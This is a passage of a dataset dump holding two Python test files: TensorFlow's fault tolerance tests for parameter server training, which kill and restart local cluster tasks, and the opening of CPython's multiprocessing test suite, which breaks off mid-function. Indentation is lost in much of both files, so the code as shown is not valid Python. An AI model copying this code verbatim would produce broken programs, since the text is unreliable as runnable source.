source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
fault_tolerance_test.py | # Lint as: python3
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Fault tolerance test for parameter server training in TF2."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gc
import sys
import threading
import time
from tensorflow.python.compat import v2_compat
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.distribute import parameter_server_strategy_v2
from tensorflow.python.distribute import test_util
from tensorflow.python.distribute.cluster_resolver import SimpleClusterResolver
from tensorflow.python.distribute.coordinator import cluster_coordinator
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import test
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import coordinator as thread_coordinator
from tensorflow.python.training import server_lib
# Substrings matched against exception text to attribute a failure to a
# worker vs. a parameter server, and thread names used to verify that the
# coordinator's background threads start and stop cleanly.
_RPC_ERROR_FROM_WORKER = "GRPC error information from remote target /job:worker"
_RPC_ERROR_FROM_PS = "GRPC error information from remote target /job:ps"
_WORKER_PREEMPTION_THREAD_NAME = "WorkerPreemptionHandler"
_WORKER_THREAD_PREFIX = "WorkerClosureProcessingLoop"
class Model(object):
  """Tiny matmul model driven through a `ClusterCoordinator`.

  Variables are created under the coordinator's strategy scope (so they live
  on the parameter servers), and helpers are provided to schedule/join
  training closures. Used by the fault tolerance tests below.
  """

  def __init__(self, coordinator):
    self.cluster_coord = coordinator
    self.strategy = self.cluster_coord.strategy
    # Variable creation must happen under the strategy scope.
    with self.cluster_coord.strategy.scope():
      self.build()

  def build(self):
    """Creates variables and the per-worker dataset iterators."""
    self.w = variables.Variable(
        initial_value=random_ops.random_uniform((10, 10)),
        dtype=dtypes.float32)
    self.iterations = variables.Variable(initial_value=0, dtype=dtypes.int32)
    # Allow external control to make the model run its train_fn in an infinite
    # loop. This allows us to reliably test worker preemption in the middle of
    # function execution.
    self.do_infinite_step = variables.Variable(False)
    self.rebuild_iterators()

  def rebuild_iterators(self, use_dataset_fn=True):
    """Recreates `iterator`/`iterator2` from a dataset_fn or a dataset."""
    if use_dataset_fn:

      def dataset_fn():
        features = random_ops.random_uniform((10, 10))
        return dataset_ops.DatasetV2.from_tensors([features]).repeat()

      source = dataset_fn
    else:
      features = random_ops.random_uniform((10, 10))
      source = dataset_ops.DatasetV2.from_tensors([features]).repeat()
    self.iterator = iter(self.cluster_coord.create_per_worker_dataset(source))
    self.iterator2 = iter(self.cluster_coord.create_per_worker_dataset(source))

  def _train_fn_internal(self, iterator, iterator2):
    # One "step": fold both iterator outputs and a fresh random matrix into w.
    acc = math_ops.matmul(array_ops.squeeze(next(iterator)), self.w)
    acc = math_ops.matmul(array_ops.squeeze(next(iterator2)), acc)
    acc = math_ops.matmul(random_ops.random_uniform((10, 10)), acc)
    self.w.assign_add(acc)

  @def_function.function
  def train_fn(self, iterator, iterator2):
    self._train_fn_internal(iterator, iterator2)
    # Keep stepping while `do_infinite_step` is set so a test can preempt a
    # worker while a function is still executing.
    while self.do_infinite_step:
      self._train_fn_internal(iterator, iterator2)
    self.iterations.assign_add(1)

  def schedule_training_functions(self, num_steps):
    """Schedules `num_steps` training closures onto the coordinator."""
    with self.strategy.scope():
      for _ in range(num_steps):
        self.cluster_coord.schedule(
            self.train_fn, args=(self.iterator, self.iterator2))

  def join_training_functions(self):
    """Clears the infinite-step flag and blocks until all closures finish."""
    self.do_infinite_step.assign(False)
    self.cluster_coord.join()
class BaseFaultToleranceTest(object):  # pylint: disable=missing-docstring
# Shared setup/teardown and kill/restart helpers for the fault tolerance
# tests; subclasses pick the worker/PS counts.
def setUp(self, num_workers, num_ps):
super(BaseFaultToleranceTest, self).setUp()
self._cluster = multi_worker_test_base.create_multi_process_cluster(
num_workers=num_workers, num_ps=num_ps, rpc_layer="grpc")
self._cluster_def = self._cluster.cluster_resolver.cluster_spec().as_dict()
# This process acts as the chief; give it an unused local port.
self._cluster_def["chief"] = [
"localhost:%d" % multi_worker_test_base.pick_unused_port()
]
cluster_resolver = SimpleClusterResolver(
server_lib.ClusterSpec(self._cluster_def), rpc_layer="grpc")
# The strategy's constructor would connect to the cluster.
self.strategy = parameter_server_strategy_v2.ParameterServerStrategyV2(
cluster_resolver)
self.cluster_coord = cluster_coordinator.ClusterCoordinator(self.strategy)
self.thread_coord = thread_coordinator.Coordinator(
clean_stop_exception_types=[])
self.num_workers = num_workers
self.num_ps = num_ps
def tearDown(self):
super(BaseFaultToleranceTest, self).tearDown()
self._cluster.stop()
self._cluster = None
def _restart(self, downtime_secs, job):
"""Kills `job` (index: 0) and restarts it after `downtime_secs`.
Args:
downtime_secs: secs before restarting the job.
job: a string specifying the job to restart.
"""
self._cluster.kill_task(job, 0)
time.sleep(downtime_secs)
self.assertFalse(context.check_alive("/job:%s/replica:0/task:0" % job))
self._cluster.start_task(job, 0)
# Block until the restarted task is reachable again.
while not context.check_alive("/job:%s/replica:0/task:0" % job):
time.sleep(1)
# Runs _restart on a background thread so a test can keep scheduling work
# while the task is down; exceptions are routed to self.thread_coord.
def _restart_in_thread(self, downtime_secs, restart_job):
def _restart_fn():
with self.thread_coord.stop_on_exception():
self._restart(downtime_secs, restart_job)
restart_thread = threading.Thread(target=_restart_fn)
restart_thread.start()
return restart_thread
def _ensure_threads_closed(self):
"""Ensures worker and preemption threads are closed."""
# Worker and preemption threads should exist before releasing
# ClusterCoordinator.
running_threads = test_util.get_running_threads()
self.assertTrue(
test_util.has_thread(_WORKER_THREAD_PREFIX, running_threads))
self.assertIn(_WORKER_PREEMPTION_THREAD_NAME, running_threads)
# Print object graph if ClusterCoordinator may leak.
if sys.getrefcount(self.cluster_coord) > 2:
try:
test_util.show_backref(self.cluster_coord)
except:  # pylint: disable=bare-except
pass
# Wait for threads to close.
self.cluster_coord = None
self.strategy = None
gc.collect()
time.sleep(1)
# Verify thread names.
running_threads = test_util.get_running_threads()
self.assertNotIn(_WORKER_PREEMPTION_THREAD_NAME, running_threads)
self.assertFalse(
test_util.has_thread(_WORKER_THREAD_PREFIX, running_threads),
"Worker thread is not stopped properly.")
# Starts a Model stepping forever and waits until every worker has picked
# up one of the infinite closures before returning.
def _create_model_and_run_indefinitely(self):
model = Model(self.cluster_coord)
model.do_infinite_step.assign(True)
model.schedule_training_functions(10)
# Model does infinite training step, so at this moment, we expect to have
# `self.num_workers` infinite closures inflight, and `10-self.num_workers`
# closures in the queue.
while (self.cluster_coord._cluster.closure_queue._inflight_closure_count <
self.num_workers):
time.sleep(0.1)
return model
# Smoke test: a freshly constructed coordinator tears its threads down.
def testClusterCoordinatorDestroyed(self):
self._ensure_threads_closed()
# Worker restart between two batches of scheduled functions: all four
# steps must complete.
def testWorkerPreemptionBetweenFunctions(self):
model = Model(self.cluster_coord)
model.schedule_training_functions(2)
model.join_training_functions()
self.assertEqual(model.iterations.numpy(), 2)
self._restart(downtime_secs=2, job="worker")
model.schedule_training_functions(2)
model.join_training_functions()
self.assertEqual(model.iterations.numpy(), 4)
# Worker restart while functions are mid-execution: closures must be
# retried, so at least 4 iterations finish.
def testWorkerPreemptionMidstFunction(self):
model = Model(self.cluster_coord)
model.do_infinite_step.assign(True)
model.schedule_training_functions(4)
# Model does infinite training step, so at this moment, we expect to have
# `self.num_workers` infinite closures inflight, and `4-self.num_workers`
# closures in the queue.
while (self.cluster_coord._cluster.closure_queue._inflight_closure_count <
self.num_workers):
time.sleep(0.1)
self.assertFalse(self.cluster_coord.done())
self._restart(downtime_secs=2, job="worker")
model.join_training_functions()
self.assertGreaterEqual(model.iterations.numpy(), 4)
# An application error (InvalidArgument) should surface from join() and
# cancel outstanding long-running closures, while later work still runs.
def testOneWorkerPreemptionWithCancellation(self):
@def_function.function
def normal_function():
x = random_ops.random_uniform((2, 10))
y = random_ops.random_uniform((10, 2))
return math_ops.reduce_mean(math_ops.matmul(x, y))
@def_function.function
def error_function():
x = random_ops.random_uniform((2, 10))
y = random_ops.random_uniform((10, 2))
check_ops.assert_non_positive_v2(
math_ops.reduce_sum(math_ops.matmul(x, y)))
return x
@def_function.function
def long_function():
x = random_ops.random_uniform((1000, 1000))
for _ in math_ops.range(10000):
a = random_ops.random_uniform((1000, 1000))
b = random_ops.random_uniform((1000, 1000))
x += math_ops.matmul(a, b)
return x
for _ in range(3):
self.cluster_coord.schedule(normal_function)
long_function_result = self.cluster_coord.schedule(long_function)
self.cluster_coord.schedule(error_function)
time.sleep(1)  # Let it run a couple steps.
self._restart(1, "worker")
with self.assertRaises(errors.InvalidArgumentError):
self.cluster_coord.join()
with self.assertRaises(errors.CancelledError):
long_function_result.fetch()
for _ in range(3):
self.cluster_coord.schedule(normal_function)
self.cluster_coord.join()
# The cluster is likely still being recovered since `join` returned early
# due to the error_function.
failure_handler = self.cluster_coord._cluster.failure_handler
failure_handler.stop()
failure_handler._preemption_handler_thread.join()
# Iterators rebuilt (dataset_fn flavor) while a worker restarts in the
# background must not break training.
def testHandleDatasetCreationFailureWithDatasetFn(self):
model = Model(self.cluster_coord)
restart_thread = self._restart_in_thread(5, "worker")
model.schedule_training_functions(3)
model.rebuild_iterators()
model.schedule_training_functions(3)
model.rebuild_iterators()
model.schedule_training_functions(3)
model.join_training_functions()
self.thread_coord.join([restart_thread])
self.assertGreaterEqual(model.iterations.numpy(), 3)
# TODO(yuefengz): consider using combinations when there is more code
# duplication.
# Same as the test above but with a concrete dataset instance instead of a
# dataset_fn.
def testHandleDatasetCreationFailureWithDataset(self):
model = Model(self.cluster_coord)
restart_thread = self._restart_in_thread(5, "worker")
model.schedule_training_functions(3)
model.rebuild_iterators(use_dataset_fn=False)
model.schedule_training_functions(3)
model.rebuild_iterators(use_dataset_fn=False)
model.schedule_training_functions(3)
model.join_training_functions()
self.thread_coord.join([restart_thread])
self.assertGreaterEqual(model.iterations.numpy(), 3)
# Direct (non-coordinator) execution on a restarted worker should raise
# UnavailableError whose message names the worker, not the PS.
def testWorkerPreemptionErrorType(self):
@def_function.function
def worker_train_fn():
x = random_ops.random_uniform((2, 10))
y = random_ops.random_uniform((10, 2))
return math_ops.reduce_mean(math_ops.matmul(x, y))
def run_fn():
with self.thread_coord.stop_on_exception():
with ops.device("/job:worker/replica:0/task:0"):
for _ in range(3):
for _ in range(3):
worker_train_fn()
time.sleep(5)
run_thread = threading.Thread(target=run_fn)
run_thread.start()
time.sleep(1)  # Let it run a couple steps.
self._restart(2, "worker")
try:
self.thread_coord.join([run_thread])
except errors.UnavailableError as e:
logging.info("Got exception %r, error message is %s", e, e)
self.assertIn(_RPC_ERROR_FROM_WORKER, str(e))  # pylint: disable=g-assert-in-except
self.assertNotIn(_RPC_ERROR_FROM_PS, str(e))
# Accept any of the transport-level failure messages gRPC may produce.
self.assertTrue("failed to connect to all addresses" in str(e) or
"Unable to find a context_id" in str(e) or
"Socket closed" in str(e) or
"Connection reset by peer" in str(e) or
"Transport closed" in str(e))
# Same scenario with an eager (non-tf.function) callable.
def testWorkerPreemptionErrorTypeWithPythonFunction(self):
def worker_train_fn():
x = random_ops.random_uniform((2, 10))
y = random_ops.random_uniform((10, 2))
return math_ops.reduce_mean(math_ops.matmul(x, y))
def run_fn():
with self.thread_coord.stop_on_exception():
with ops.device("/job:worker/replica:0/task:0"):
for _ in range(3):
for _ in range(3):
worker_train_fn()
time.sleep(5)
run_thread = threading.Thread(target=run_fn)
run_thread.start()
time.sleep(1)  # Let it run a couple steps.
self._restart(2, "worker")
try:
self.thread_coord.join([run_thread])
except errors.UnavailableError as e:
logging.info("Got exception %r, error message is %s", e, e)
self.assertIn(_RPC_ERROR_FROM_WORKER, str(e))  # pylint: disable=g-assert-in-except
self.assertNotIn(_RPC_ERROR_FROM_PS, str(e))
self.assertTrue("failed to connect to all addresses" in str(e) or
"Unable to find a context_id" in str(e) or
"Socket closed" in str(e) or
"Connection reset by peer" in str(e) or
"Transport closed" in str(e))
# Killing a PS that holds a variable should raise Unavailable (connection
# lost) or Aborted (incarnation mismatch after restart), naming the PS.
def testPSPreemptionErrorType(self):
with ops.device("/job:ps/replica:0/task:0"):
v = variables.Variable(
initial_value=random_ops.random_uniform((2, 10)),
dtype=dtypes.float32)
@def_function.function
def worker_train_fn():
y = random_ops.random_uniform((10, 2))
return math_ops.reduce_mean(math_ops.matmul(v, y))
def run_fn():
with self.thread_coord.stop_on_exception():
with ops.device("/job:worker/replica:0/task:0"):
for _ in range(3):
for _ in range(3):
worker_train_fn()
time.sleep(5)
run_thread = threading.Thread(target=run_fn)
run_thread.start()
time.sleep(1)  # Let it run a couple steps.
# Use a short restart delay to cover the case that RPC channel is reused
self._restart(1, "ps")
try:
self.thread_coord.join([run_thread])
except (errors.UnavailableError, errors.AbortedError) as e:
logging.info("Got exception %r, error message is %s", e, e)
self.assertIn(_RPC_ERROR_FROM_PS, str(e))  # pylint: disable=g-assert-in-except
if isinstance(e, errors.UnavailableError):
self.assertTrue("failed to connect to all addresses" in str(e) or
"Unable to find a context_id" in str(e) or
"Socket closed" in str(e) or
"Connection reset by peer" in str(e) or
"Transport closed" in str(e))
if isinstance(e, errors.AbortedError):
self.assertIn("RecvTensor expects a different device incarnation",
str(e))
self._ensure_threads_closed()
# Both workers die and come back; training should still converge to at
# least the 10 scheduled steps.
def testTwoWorkersPreempted(self):
if self.num_workers < 2:
self.skipTest("Worker number is less than 2.")
model = self._create_model_and_run_indefinitely()
self.assertFalse(self.cluster_coord.done())
self._cluster.kill_task("worker", 0)
self._cluster.kill_task("worker", 1)
time.sleep(2)
self.assertFalse(context.check_alive("/job:worker/replica:0/task:0"))
self.assertFalse(context.check_alive("/job:worker/replica:0/task:1"))
self._cluster.start_task("worker", 0)
self._cluster.start_task("worker", 1)
time.sleep(2)
self.assertTrue(context.check_alive("/job:worker/replica:0/task:0"))
self.assertTrue(context.check_alive("/job:worker/replica:0/task:1"))
model.join_training_functions()
self.assertGreaterEqual(model.iterations.numpy(), 10)
# One worker dies and restarts twice in a row.
def testWorkerContinuousFailure(self):
model = self._create_model_and_run_indefinitely()
self.assertFalse(self.cluster_coord.done())
self._cluster.kill_task("worker", 0)
time.sleep(2)
self.assertFalse(context.check_alive("/job:worker/replica:0/task:0"))
self._cluster.start_task("worker", 0)
time.sleep(2)
self.assertTrue(context.check_alive("/job:worker/replica:0/task:0"))
self._cluster.kill_task("worker", 0)
time.sleep(2)
self.assertFalse(context.check_alive("/job:worker/replica:0/task:0"))
self._cluster.start_task("worker", 0)
time.sleep(2)
self.assertTrue(context.check_alive("/job:worker/replica:0/task:0"))
model.join_training_functions()
self.assertGreaterEqual(model.iterations.numpy(), 10)
def testPSFailureWhileRecoveryFromWokerFailure(self):
  """Kills a worker and a PS concurrently; the failure must surface via join.

  A PS failure is unrecoverable for in-flight training, so
  `join_training_functions` is expected to raise.
  """
  model = self._create_model_and_run_indefinitely()
  time.sleep(1)
  self.assertFalse(self.cluster_coord.done())

  def kill(task):
    self._cluster.kill_task(task, 0)
    # Bug fix: was `self.sleep(1)` — TestCase has no `sleep` attribute, so
    # this thread died with AttributeError and never restarted the task.
    time.sleep(1)
    self._cluster.start_task(task, 0)

  kill_thread_1 = threading.Thread(target=kill, args=("worker",))
  kill_thread_2 = threading.Thread(target=kill, args=("ps",))
  kill_thread_1.start()
  kill_thread_2.start()
  kill_thread_1.join()
  kill_thread_2.join()
  with self.assertRaises(
      (errors.UnavailableError, errors.InvalidArgumentError)):
    model.join_training_functions()
# Fetched numpy results are cached on the coordinator, so they survive the
# death of the worker that produced them.
def testNumpyFetchedAfterWorkerFailure(self):
with self.strategy.scope():
v = variables.Variable(initial_value=0, dtype=dtypes.int32)
@def_function.function
def worker_fn():
return v + 1, v - 1
remote_value = self.cluster_coord.schedule(worker_fn)
# Attempt to fetch before killing worker task should succeed.
self.assertEqual((1, -1), remote_value.fetch())
self._cluster.kill_task("worker", 0)
# So should attempt to fetch after killing worker task.
self.assertEqual((1, -1), remote_value.fetch())
# get() returns chief-side tensors that outlive the workers, while the raw
# worker-side tensors in _values become unreachable once workers die.
def testTensorGotAfterWorkerFailure(self):
with self.strategy.scope():
v = variables.Variable(initial_value=0, dtype=dtypes.int32)
@def_function.function
def worker_fn():
return v + 1, v - 1
remote_value = self.cluster_coord.schedule(worker_fn)
# Attempt to fetch before killing worker task should succeed.
fetched = remote_value.get()[0]
self.assertIsInstance(fetched, ops.Tensor)
self.assertEqual(fetched.device, "/job:chief/replica:0/task:0/device:CPU:0")
self.assertEqual((1, -1), remote_value.get())
remote_value.get()[0].numpy()
# As well as the remote tensors that point to worker0 or worker1.
values = remote_value._values[0]
self.assertIsInstance(values, ops.Tensor)
self.assertRegex(values.device,
"/job:worker/replica:0/task:[0-1]/device:CPU:0")
self.assertEqual((1, -1), remote_value._values)
remote_value._values[0].numpy()
# Terminate the workers and wait a little so that they are indeed killed.
for i in range(self.num_workers):
self._cluster.kill_task("worker", i)
time.sleep(5)
# Attempt to fetch after killing worker tasks should succeed as well.
remote_value.get()[0].numpy()
self.assertEqual((1, -1), remote_value.get())
# Attempting to copy the tensor from worker now should fail.
with self.assertRaises(errors.UnavailableError) as cm:
remote_value._values[0].numpy()
self.assertIn("failed to connect to all addresses", cm.exception.message)
self.assertIn("/job:worker/replica:0/task:", cm.exception.message)
def testClusterStateNotDisrupted(self):
# This test has side effects and can disrupt other tests, even if the
# resource created by it will not be used in following tests.
# TODO(b/155209534): enable this test.
# self.testPSPreemptionErrorType()
self.thread_coord = thread_coordinator.Coordinator(
clean_stop_exception_types=[])
self.testWorkerPreemptionMidstFunction()
self.thread_coord = thread_coordinator.Coordinator(
clean_stop_exception_types=[])
self.testWorkerPreemptionErrorType()
# In previous tests, workers may fail after training is done. But the
# following tests start with creating resources where failure is not
# handled.
# TODO(b/153888707): enable the following two tests.
# self.testTwoWorkersPreempted()
# self.testWorkerContinuousFailure()
# PS death is unrecoverable: join() must raise once the closure queue has
# recorded the error.
def testJoinRaisesUnavailableErrorAtPsFailure(self):
self._create_model_and_run_indefinitely()
self._cluster.kill_task("ps", 0)
while self.cluster_coord._cluster.closure_queue._error is None:
time.sleep(1)
with self.assertRaises((errors.UnavailableError, errors.NotFoundError,
errors.FailedPreconditionError)):
self.cluster_coord.join()
# Likewise, schedule() must re-raise a previously recorded PS failure.
def testScheduleRaisesUnavailableErrorAtPsFailure(self):
self._create_model_and_run_indefinitely()
self._cluster.kill_task("ps", 0)
while self.cluster_coord._cluster.closure_queue._error is None:
time.sleep(1)
with self.assertRaises((errors.UnavailableError, errors.NotFoundError,
errors.FailedPreconditionError)):
self.cluster_coord.schedule(def_function.function(lambda: None))
# Direct execution on any worker after all PS died should be classified as
# a PS failure by cluster_coordinator._is_ps_failure.
def testWorkerExecutionAfterPsFailureRaisesExpectedError(self):
model = self._create_model_and_run_indefinitely()
for i in range(self.num_ps):
self._cluster.kill_task("ps", i)
while self.cluster_coord._cluster.closure_queue._error is None:
time.sleep(1)
@def_function.function
def trivial_function():
return model.iterations + 1
for i in range(self.num_workers):
try:
with ops.device("/job:worker/replica:0/task:{}".format(i)):
trivial_function()
except Exception as e:  # pylint: disable=broad-except
if cluster_coordinator._is_ps_failure(e):
if i < self.num_workers - 1:
continue
return
raise AssertionError("Executing a function after PS fails, should "
"result in a PS failure.")
# context.async_wait() must not raise merely because a remote worker died.
def testAsyncWaitIsNoOp(self):
if self.num_workers < 2:
self.skipTest("Worker number is less than 2.")
model = self._create_model_and_run_indefinitely()
self.assertFalse(self.cluster_coord.done())
self._cluster.kill_task("worker", 0)
time.sleep(2)
self.assertFalse(context.check_alive("/job:worker/replica:0/task:0"))
# Should pass without exception even with failed remote workers
context.async_wait()
model.join_training_functions()
self.assertGreaterEqual(model.iterations.numpy(), 10)
class MultiWorkerFaultToleranceTest(BaseFaultToleranceTest, test.TestCase):
  """Fault tolerance tests on the ordinary multi-task topology.

  Runs the shared test suite against a cluster of two workers and two
  parameter servers.
  """

  def setUp(self):
    super(MultiWorkerFaultToleranceTest, self).setUp(2, 2)
class SingleWorkerFaultToleranceTest(BaseFaultToleranceTest, test.TestCase):
  """Fault tolerance tests on a minimal 1-worker / 1-PS cluster.

  With several workers, training can succeed using the workers that did not
  fail; with a single worker the suite can only pass if training continues
  after the *only* worker goes down and comes back. Single-worker clusters
  are rare in practice, but these tests pin down that recovery behavior.
  """

  def setUp(self):
    super(SingleWorkerFaultToleranceTest, self).setUp(1, 1)
if __name__ == "__main__":
# Tests must run under TF2 behavior and the multi-process test runner.
v2_compat.enable_v2_behavior()
multi_process_runner.test_main()
|
_test_multiprocessing.py | #
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import contextlib
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import weakref
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 60.0  # seconds
def latin(s):
    """Encode *s* with the latin-1 codec (alias 'latin')."""
    return s.encode('latin')
def close_queue(queue):
    """Close a real multiprocessing Queue and join its feeder thread.

    Anything that is not a `multiprocessing.queues.Queue` instance (manager
    proxies, dummy queues, ...) is left untouched.
    """
    if not isinstance(queue, multiprocessing.queues.Queue):
        return
    queue.close()
    queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API as threading.Thread
# (join() and is_alive()), the threading support helper can be reused here.
support.join_thread(process, timeout=TIMEOUT)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False     # making true makes tests take a lot longer
                          # and can sometimes cause some non-serious
                          # failures because some calls block a bit
                          # longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
# Some platforms ship a semaphore implementation without sem_getvalue().
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
    """Wait for *handle* to become ready; a negative timeout blocks forever."""
    # multiprocessing.connection.wait treats None as an infinite timeout.
    effective_timeout = None if (timeout is not None and timeout < 0.0) else timeout
    return wait([handle], effective_timeout)
# Upper bound on file descriptors; fall back to a conservative default when
# sysconf is unavailable.
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
    """Check that the system supports enough semaphores to run the test."""
    nsems_min = 256  # minimum number of semaphores guaranteed by POSIX
    try:
        nsems = os.sysconf("SC_SEM_NSEMS_MAX")
    except (AttributeError, ValueError):
        # sysconf not available or setting not available
        return
    # -1 means "no limit"; anything at or above the POSIX minimum is fine.
    if nsems != -1 and nsems < nsems_min:
        raise unittest.SkipTest("The OS doesn't support enough semaphores "
                                "to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
    """Callable proxy that records how long the wrapped function took."""

    def __init__(self, func):
        self.func = func
        self.elapsed = None  # duration of the most recent call, in seconds

    def __call__(self, *args, **kwds):
        start = time.monotonic()
        try:
            return self.func(*args, **kwds)
        finally:
            # Record the elapsed time even if the call raised.
            self.elapsed = time.monotonic() - start
#
# Base class for test cases
#
class BaseTestCase(object):
    """Mixin with helpers shared across the test-suite flavours."""

    ALLOWED_TYPES = ('processes', 'manager', 'threads')

    def assertTimingAlmostEqual(self, a, b):
        # Timing comparisons are only meaningful when CHECK_TIMINGS is on.
        if CHECK_TIMINGS:
            self.assertAlmostEqual(a, b, 1)

    def assertReturnsIfImplemented(self, value, func, *args):
        try:
            res = func(*args)
        except NotImplementedError:
            return None
        return self.assertEqual(value, res)

    # For the sanity of Windows users, rather than crashing or freezing in
    # multiple ways.
    def __reduce__(self, *args):
        raise NotImplementedError("shouldn't try to pickle a test case")

    __reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
    """Return the current value of a semaphore-like object.

    Tries the object's own get_value() first, then the private value
    attributes used by different semaphore implementations.
    """
    try:
        return self.get_value()
    except AttributeError:
        pass
    for attr in ('_Semaphore__value', '_value'):
        try:
            return getattr(self, attr)
        except AttributeError:
            continue
    raise NotImplementedError
#
# Testcases
#
class DummyCallable:
    """Callable target used to verify Process drops its target reference."""

    def __call__(self, q, c):
        # The callable is also passed to itself as an argument so the test
        # can check the instance round-trips intact.
        assert isinstance(c, DummyCallable)
        q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
# Sanity-check the attributes of the current (main) process.
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
# Child-side helper: echoes its arguments and identity back via the queue.
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
# End-to-end Process lifecycle: attributes before start, while alive, and
# after join, with results echoed back by the _test child helper.
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
# The child receives args without the queue itself (args[1:]).
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
# Child-side helpers used by the kill/terminate and stress tests below.
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
# Common driver for terminate()/kill(): starts a sleeping child, applies
# `meth`, and returns the child's exitcode.
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
# join with a zero/negative timeout must return immediately.
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
